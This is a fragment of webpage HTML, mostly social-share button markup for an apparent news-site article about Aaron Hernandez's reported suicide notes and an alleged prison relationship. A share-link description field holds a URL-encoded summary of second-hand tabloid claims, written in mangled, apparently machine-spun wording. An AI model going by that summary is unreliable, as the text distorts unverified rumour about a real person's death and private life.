target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_viber nolightbox essb_after_more"> <a href="viber://forward?text=Aaron%20Hernandez%20Wrote%20Suicide%20Note%20To%20Alleged%20Gay%20Prison%20Lover%20Before%20Death%20—%20Report%20http%3A%2F%2Fwww.thenewstrack.com%2F%3Fp%3D147097" title="" onclick="essb_tracking_only('', 'viber', '246690210', true);" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_sidebar-close nolightbox"> <a href="" title="" onclick="" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li></ul></div><div class="essb_morepopup essb_morepopup_246690210" style="display:none;"> <a href="#" class="essb_morepopup_close" onclick="essb_toggle_less_popup('246690210'); return false;"></a> <div class="essb_morepopup_content essb_morepopup_content_246690210"><div class="essb_links essb_displayed_more_popup essb_share essb_template_copy-retina essb_1934194569 essb_width_columns_3 print-no" id="essb_displayed_more_popup_1934194569" data-essb-postid="147097" data-essb-position="more_popup" data-essb-button-style="button" data-essb-template="copy-retina" data-essb-counter-pos="left" data-essb-url="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" data-essb-twitter-url="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" data-essb-instance="1934194569"><ul class="essb_links_list"><li class="essb_item essb_link_facebook nolightbox"> <a href="http://www.facebook.com/sharer/sharer.php?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;http://www.facebook.com/sharer/sharer.php?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;facebook&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Facebook</span></a></li><li class="essb_item essb_link_twitter nolightbox"> <a href="#" title="" onclick="essb_window(&#39;https://twitter.com/intent/tweet?text=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&amp;url=http://www.thenewstrack.com/?p=147097&amp;counturl=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;hashtags=&#39;,&#39;twitter&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Twitter</span></a></li><li class="essb_item essb_link_google nolightbox"> <a href="https://plus.google.com/share?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;https://plus.google.com/share?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;google&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Google+</span></a></li><li class="essb_item essb_link_pinterest nolightbox"> <a href="#" title="" onclick="essb_pinterest_picker(&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Pinterest</span></a></li><li class="essb_item essb_link_linkedin nolightbox"> <a href="http://www.linkedin.com/shareArticle?mini=true&amp;ro=true&amp;trk=EasySocialShareButtons&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&amp;url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;http://www.linkedin.com/shareArticle?mini=true&amp;ro=true&amp;trk=EasySocialShareButtons&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&amp;url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;linkedin&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">LinkedIn</span></a></li><li class="essb_item essb_link_digg nolightbox"> <a href="http://digg.com/submit?phase=2amp;url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;http://digg.com/submit?phase=2amp;url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;digg&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Digg</span></a></li><li class="essb_item essb_link_del nolightbox"> <a href="https://delicious.com/save?v=5&noui&jump=close&url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;https://delicious.com/save?v=5&noui&jump=close&url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;del&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Del</span></a></li><li class="essb_item essb_link_stumbleupon nolightbox"> <a href="http://www.stumbleupon.com/badge/?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;http://www.stumbleupon.com/badge/?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;stumbleupon&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">StumbleUpon</span></a></li><li class="essb_item essb_link_tumblr nolightbox"> <a href="http://tumblr.com/share?s=&v=3&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&u=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F" title="" onclick="essb_window(&#39;http://tumblr.com/share?s=&v=3&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&u=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F&#39;,&#39;tumblr&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Tumblr</span></a></li><li class="essb_item essb_link_vk nolightbox"> <a href="http://vkontakte.ru/share.php?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;http://vkontakte.ru/share.php?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;vk&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">VKontakte</span></a></li><li class="essb_item essb_link_print nolightbox"> <a href="#" title="" onclick="essb_print(&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Print</span></a></li><li class="essb_item essb_link_mail nolightbox"> <a href="#" title="" onclick="essb_mailform_1934194569(&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Email</span></a></li><li class="essb_item essb_link_flattr nolightbox"> <a href="https://flattr.com/submit/auto?user_id=&url=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F&title=Aaron%2BHernandez%2BWrote%2BSuicide%2BNote%2BTo%2BAlleged%2BGay%2BPrison%2BLover%2BBefore%2BDeath%2B%25E2%2580%2594%2BReport&description=Aaron+Hernandez+supposedly+composed+three+notes+before+he+conferred+suicide+in+his+jail+cell.+Presently%2C+a+stunning+new+report+asserts+that+one+was+routed+to+his+gay+sweetheart+who+is+said+to+be+under+suicide+look+as+more+subtle+elements+of+Aaron%27s+demise+are+uncovered.+Aaron+Hernandez+supposedly+composed+three+suicide+letters+that+were+found+in+his+correctional+facility+cell+after+he+hanged+himself+on+Apr.+19.+The+notes+were+purportedly+found+the+day+after+he+killed+himself+at+27+years+old+at+the+Souza+Baranowski+Correctional+Center.+He+was+serving+a+lifelong+incarceration+without+the+likelihood+of+parole+for+the+murder+of+Odin+Lloyd%2C+his+life+partner%27s+sister%27s+sweetheart.+Another+report+asserted+that+the+letters+were+routed+to+Aaron%27s+life+partner+Shayanna+Jenkins-Hernandez%2C+his+four-year+old+little+girl+Avielle%2C+and+his+%22gay+jailhouse+significant+other%2C%22+as+per+a+source+from+The+Daily+Mail.+Past+reports+said+that+one+letter+was+routed+to+general+society+and+the+others+were+for+particular+individuals.+&language=sq_AL&tags=Aaron+Hernandez%2CAaron+Hernandez+dead%2CCelebrity+News&hidden=0&category=text" title="" onclick="essb_window(&#39;https://flattr.com/submit/auto?user_id=&url=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F&title=Aaron%2BHernandez%2BWrote%2BSuicide%2BNote%2BTo%2BAlleged%2BGay%2BPrison%2BLover%2BBefore%2BDeath%2B%25E2%2580%2594%2BReport&description=Aaron+Hernandez+supposedly+composed+three+notes+before+he+conferred+suicide+in+his+jail+cell.+Presently%2C+a+stunning+new+report+asserts+that+one+was+routed+to+his+gay+sweetheart+who+is+said+to+be+under+suicide+look+as+more+subtle+elements+of+Aaron%27s+demise+are+uncovered.+Aaron+Hernandez+supposedly+composed+three+suicide+letters+that+were+found+in+his+correctional+facility+cell+after+he+hanged+himself+on+Apr.+19.+The+notes+were+purportedly+found+the+day+after+he+killed+himself+at+27+years+old+at+the+Souza+Baranowski+Correctional+Center.+He+was+serving+a+lifelong+incarceration+without+the+likelihood+of+parole+for+the+murder+of+Odin+Lloyd%2C+his+life+partner%27s+sister%27s+sweetheart.+Another+report+asserted+that+the+letters+were+routed+to+Aaron%27s+life+partner+Shayanna+Jenkins-Hernandez%2C+his+four-year+old+little+girl+Avielle%2C+and+his+%22gay+jailhouse+significant+other%2C%22+as+per+a+source+from+The+Daily+Mail.+Past+reports+said+that+one+letter+was+routed+to+general+society+and+the+others+were+for+particular+individuals.+&language=sq_AL&tags=Aaron+Hernandez%2CAaron+Hernandez+dead%2CCelebrity+News&hidden=0&category=text&#39;,&#39;flattr&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Flattr</span></a></li><li class="essb_item essb_link_reddit nolightbox"> <a href="http://reddit.com/submit?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;http://reddit.com/submit?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;reddit&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Reddit</span></a></li><li class="essb_item essb_link_buffer nolightbox"> <a href="https://bufferapp.com/add?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&text=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&via=&picture=&count=horizontal&source=button" title="" onclick="essb_window(&#39;https://bufferapp.com/add?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&text=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&via=&picture=&count=horizontal&source=button&#39;,&#39;buffer&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Buffer</span></a></li><li class="essb_item essb_link_love nolightbox"> <a href="#" title="" onclick="essb_lovethis(&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Love This</span></a></li><li class="essb_item essb_link_weibo nolightbox"> <a href="http://service.weibo.com/share/share.php?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;http://service.weibo.com/share/share.php?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;weibo&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Weibo</span></a></li><li class="essb_item essb_link_pocket nolightbox"> <a href="https://getpocket.com/save?title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&url=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F" title="" onclick="essb_window(&#39;https://getpocket.com/save?title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&url=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F&#39;,&#39;pocket&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Pocket</span></a></li><li class="essb_item essb_link_xing nolightbox"> <a href="https://www.xing.com/social_plugins/share?h=1;url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;https://www.xing.com/social_plugins/share?h=1;url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;xing&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Xing</span></a></li><li class="essb_item essb_link_ok nolightbox"> <a href="http://www.odnoklassniki.ru/dk?st.cmd=addShare&st.s=1&st._surl=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;http://www.odnoklassniki.ru/dk?st.cmd=addShare&st.s=1&st._surl=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;ok&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Odnoklassniki</span></a></li><li class="essb_item essb_link_mwp nolightbox"> <a href="http://managewp.org/share/form?url=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F" title="" onclick="essb_window(&#39;http://managewp.org/share/form?url=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F&#39;,&#39;mwp&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">ManageWP.org</span></a></li><li class="essb_item essb_link_whatsapp nolightbox"> <a href="whatsapp://send?text=Aaron%20Hernandez%20Wrote%20Suicide%20Note%20To%20Alleged%20Gay%20Prison%20Lover%20Before%20Death%20—%20Report%20http%3A%2F%2Fwww.thenewstrack.com%2F%3Fp%3D147097" title="" onclick="essb_tracking_only('', 'whatsapp', '1934194569', true);" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">WhatsApp</span></a></li><li class="essb_item essb_link_meneame nolightbox"> <a href="http://www.meneame.net/submit.php?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;http://www.meneame.net/submit.php?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;meneame&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Meneame</span></a></li><li class="essb_item essb_link_blogger nolightbox"> <a href="https://www.blogger.com/blog_this.pyra?t&u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&n=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;https://www.blogger.com/blog_this.pyra?t&u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&n=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;blogger&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Blogger</span></a></li><li class="essb_item essb_link_amazon nolightbox"> <a href="http://www.amazon.com/gp/wishlist/static-add?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;http://www.amazon.com/gp/wishlist/static-add?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;amazon&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Amazon</span></a></li><li class="essb_item essb_link_yahoomail nolightbox"> <a href="http://compose.mail.yahoo.com/?body=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;http://compose.mail.yahoo.com/?body=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;yahoomail&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Yahoo Mail</span></a></li><li class="essb_item essb_link_gmail nolightbox"> <a href="https://mail.google.com/mail/u/0/?view=cm&fs=1&su=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&body=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&ui=2&tf=1" title="" onclick="essb_window(&#39;https://mail.google.com/mail/u/0/?view=cm&fs=1&su=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&body=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&ui=2&tf=1&#39;,&#39;gmail&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Gmail</span></a></li><li class="essb_item essb_link_aol nolightbox"> <a href="http://webmail.aol.com/Mail/ComposeMessage.aspx?subject=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&body=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;http://webmail.aol.com/Mail/ComposeMessage.aspx?subject=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&body=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;aol&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">AOL</span></a></li><li class="essb_item essb_link_newsvine nolightbox"> <a href="http://www.newsvine.com/_tools/seed&save?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&h=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;http://www.newsvine.com/_tools/seed&save?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&h=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;newsvine&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Newsvine</span></a></li><li class="essb_item essb_link_hackernews nolightbox"> <a href="https://news.ycombinator.com/submitlink?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;https://news.ycombinator.com/submitlink?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;hackernews&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">HackerNews</span></a></li><li class="essb_item essb_link_evernote nolightbox"> <a href="http://www.evernote.com/clip.action?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;http://www.evernote.com/clip.action?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;evernote&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Evernote</span></a></li><li class="essb_item essb_link_myspace nolightbox"> <a href="https://myspace.com/post?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;https://myspace.com/post?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;myspace&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">MySpace</span></a></li><li class="essb_item essb_link_mailru nolightbox"> <a href="http://connect.mail.ru/share?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&description=" title="" onclick="essb_window(&#39;http://connect.mail.ru/share?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&description=&#39;,&#39;mailru&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Mail.ru</span></a></li><li class="essb_item essb_link_viadeo nolightbox"> <a href="https://www.viadeo.com/?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;https://www.viadeo.com/?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;viadeo&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Viadeo</span></a></li><li class="essb_item essb_link_line nolightbox"> <a href="line://msg/text/Aaron%20Hernandez%20Wrote%20Suicide%20Note%20To%20Alleged%20Gay%20Prison%20Lover%20Before%20Death%20—%20Report%20http%3A%2F%2Fwww.thenewstrack.com%2F%3Fp%3D147097" title="" onclick="essb_window(&#39;line://msg/text/Aaron%20Hernandez%20Wrote%20Suicide%20Note%20To%20Alleged%20Gay%20Prison%20Lover%20Before%20Death%20—%20Report%20http%3A%2F%2Fwww.thenewstrack.com%2F%3Fp%3D147097&#39;,&#39;line&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Line</span></a></li><li class="essb_item essb_link_flipboard nolightbox"> <a href="https://share.flipboard.com/bookmarklet/popout?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;https://share.flipboard.com/bookmarklet/popout?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;flipboard&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Flipboard</span></a></li><li class="essb_item essb_link_comments nolightbox"> <a href="#comments" title="" onclick="" target="_self" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Comments</span></a></li><li class="essb_item essb_link_yummly nolightbox"> <a href="http://www.yummly.com/urb/verify?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&image=http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez.png&yumtype=button" title="" onclick="essb_window(&#39;http://www.yummly.com/urb/verify?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&image=http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez.png&yumtype=button&#39;,&#39;yummly&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Yummly</span></a></li><li class="essb_item essb_link_sms nolightbox"> <a href="sms:&body=Aaron%20Hernandez%20Wrote%20Suicide%20Note%20To%20Alleged%20Gay%20Prison%20Lover%20Before%20Death%20—%20Report%20http%3A%2F%2Fwww.thenewstrack.com%2F%3Fp%3D147097" title="" onclick="essb_window(&#39;sms:&body=Aaron%20Hernandez%20Wrote%20Suicide%20Note%20To%20Alleged%20Gay%20Prison%20Lover%20Before%20Death%20—%20Report%20http%3A%2F%2Fwww.thenewstrack.com%2F%3Fp%3D147097&#39;,&#39;sms&#39;,&#39;1934194569&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">SMS</span></a></li><li class="essb_item essb_link_viber nolightbox"> <a href="viber://forward?text=Aaron%20Hernandez%20Wrote%20Suicide%20Note%20To%20Alleged%20Gay%20Prison%20Lover%20Before%20Death%20—%20Report%20http%3A%2F%2Fwww.thenewstrack.com%2F%3Fp%3D147097" title="" onclick="essb_tracking_only('', 'viber', '1934194569', true);" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Viber</span></a></li></ul></div></div></div> <div class="essb_morepopup_shadow essb_morepopup_shadow_246690210" onclick="essb_toggle_less_popup('246690210'); return false;"></div>

    <!--

        Theme: Newspaper by tagDiv 2016
